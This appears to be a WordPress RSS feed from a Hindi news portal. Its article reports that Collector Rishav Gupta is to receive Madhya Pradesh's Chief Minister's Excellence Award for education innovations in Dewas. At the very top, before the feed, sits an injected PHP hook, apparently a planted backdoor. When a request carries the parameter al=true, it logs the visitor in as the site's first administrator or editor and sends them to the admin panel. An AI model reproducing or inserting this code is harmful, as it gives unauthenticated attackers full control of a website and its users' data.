// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Collector Rishabh Gupta – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 19 Apr 2025 11:16:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 कलेक्टर ऋषव गुप्ता को मिलेगा ‘मुख्यमंत्री उत्कृष्टता पुरस्कार’, देवास में किए नवाचारों के लिए मुख्यमंत्री द्वारा किए जाएंगे सम्मानित https://pratyushaashakinayikiran.com/?p=150026 Sat, 19 Apr 2025 11:16:00 +0000 https://pratyushaashakinayikiran.com/?p=150026 भोपाल
 खंडवा कलेक्टर ऋषव गुप्ता को मुख्यमंत्री उत्कृष्टता पुरस्कार वर्ष 2022-23 से सम्मानित किया जाएगा। ये पुरस्कार उन्हें उनके प्रशासनिक नवाचारों के लिए प्रदान किया जाएगा। देवास के बाद खंडवा में पदस्थ हुए कलेक्टर ऋषव गुप्ता ने यहां भी नवाचारों की श्रृंखला जारी रखी है।

हाल ही में उन्होंने स्कूली बच्चों के लिए चेयर्स प्रतियोगिता और कोडिंग प्रोग्राम जैसी अभिनव पहल शुरू की है। वहीं, लंबे समय से लंबित दादाजी मंदिर ट्रस्ट का मामला भी सफलतापूर्वक  सुलझाया गया है। इस पुरस्कार के लिए प्रदेशभर से कुल 14 अधिकारियों का चयन किया गया है। भोपाल में होने वाले एक विशेष समारोह में मुख्यमंत्री डॉ मोहन यादव द्वारा ये पुरस्कार प्रदान किए जाएंगे।

कलेक्टर ऋषव गुप्ता को मिलेगा ‘मुख्यमंत्री उत्कृष्टता पुरस्कार’

मध्यप्रदेश शासन द्वारा वर्ष 2022-23 के लिए घोषित मुख्यमंत्री उत्कृष्टता पुरस्कार की सूची में खंडवा कलेक्टर ऋषव गुप्ता का नाम भी शामिल  है। उन्हें यह पुरस्कार देवास जिले में उनके कार्यकाल के दौरान शिक्षा क्षेत्र में किए गए महत्वपूर्ण नवाचार के लिए दिया जाएगा। उन्होंने देवास के स्कूलों में स्मार्ट टीवी के माध्यम से डिजिटल शिक्षा को बढ़ावा दिया जिसे मानव संसाधन विकास की श्रेणी में श्रेष्ठ नवाचार के रूप में चुना गया है।
मुख्यमंत्री द्वारा किया जाएगा सम्मानित

खंडवा में पदस्थ होने के बाद से ही कलेक्टर ऋषव गुप्ता ने जनहितकारी योजनाओं और नवाचारों के माध्यम से अपनी अलग पहचान बनाई है। सामान्य प्रशासन विभाग के सचिव अनिल सुचारी के अनुसार पुरस्कार स्वरूप ऋषव गुप्ता को 1 लाख की राशि और प्रशस्ति पत्र प्रदान किया जाएगा। यह सम्मान मुख्यमंत्री डॉ. मोहन यादव द्वारा भोपाल में आयोजित एक विशेष समारोह में दिया जाएगा। प्रदेशभर से कुल 14 अधिकारियों को इस पुरस्कार से नवाज़ा जाएगा।

]]>